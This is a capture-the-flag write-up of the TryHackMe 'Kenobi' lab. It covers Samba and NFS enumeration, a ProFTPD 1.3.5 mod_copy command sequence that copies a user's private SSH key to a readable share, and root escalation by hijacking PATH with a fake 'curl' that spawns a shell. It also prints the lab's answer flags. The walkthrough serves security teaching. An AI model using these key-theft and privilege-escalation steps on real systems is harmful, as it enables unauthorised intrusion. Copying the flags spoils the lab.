TryHackMe - Kenobi - Writeup

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

NMAP Scan

root@ip-10-10-207-9:~# nmap -sC -sV -A 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:23 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      49912/udp  mountd
|   100005  1,2,3      58881/tcp  mountd
|   100021  1,3,4      36376/udp  nlockmgr
|   100021  1,3,4      39717/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-05-06T13:24:10-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-06 19:24:10
|_  start_date: 1600-12-31 23:58:45

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds

Enumerating Samba for shares

root@ip-10-10-207-9:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:39 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:1C:33:5D:1A:83 (Unknown)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.207.215\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds

Using the nmap command above, how many shares have been found?

Answer: 3

root@ip-10-10-207-9:~# smbclient //10.10.207.215/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:56:07 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

		9204224 blocks of size 1024. 6703228 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (2987.5 KiloBytes/sec) (average 2987.5 KiloBytes/sec)
smb: \> 

Once you’re connected, list the files on the share. What is the file can you see?

Answer: log.txt

What port is FTP running on?

Answer: 21

root@ip-10-10-207-9:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:51 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  2010404.0  6703224.0  24%   16.0T        32000
MAC Address: 02:1C:33:5D:1A:83 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds

What mount can we see?

Answer: /var

Gain initial access with ProFtpd

What is the version?

Answer: 1.3.5

root@ip-10-10-207-9:~# searchsploit proftpd 1.3.5

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
---------------------------------------------- ---------------------------------

How many exploits are there for the ProFTPd running?

Answer: 3

root@ip-10-10-207-9:~# nc 10.10.207.215 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
root@ip-10-10-207-9:~# mkdir /mnt/kenobiNFS
root@ip-10-10-207-9:~# mount 10.10.207.215:/var /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS

root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt  6 root   root   4096 May  6 20:15 .
drwxr-xr-x 14 root   root   4096 Sep  4  2019 ..
-rw-r--r--  1 ubuntu ubuntu 1675 May  6 20:15 id_rsa
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------  3 root   root   4096 May  6 19:19 systemd-private-25feb6d12a1b4df9a4d0e2993544b880-systemd-timesyncd.service-cxdFHd
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

root@ip-10-10-207-9:~# cp /mnt/kenobiNFS/tmp/id_rsa ~

root@ip-10-10-207-9:~# ssh -i id_rsa kenobi@10.10.207.215
The authenticity of host '10.10.207.215 (10.10.207.215)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.207.215' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

What is Kenobi’s user flag (/home/kenobi/user.txt)?

Answer: d0b0f3f53b6caa532a83915e19224899

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

What file looks particularly out of the ordinary?

Answer: /usr/bin/menu

Run the binary, how many options appear?

Answer: 3

kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02
# 

What is the root flag (/root/root.txt)?

Answer: 177b3cd8562289f37382721c28381f02

Thanks for reading.

TryHackMe - Kenobi

Written on May 18, 2021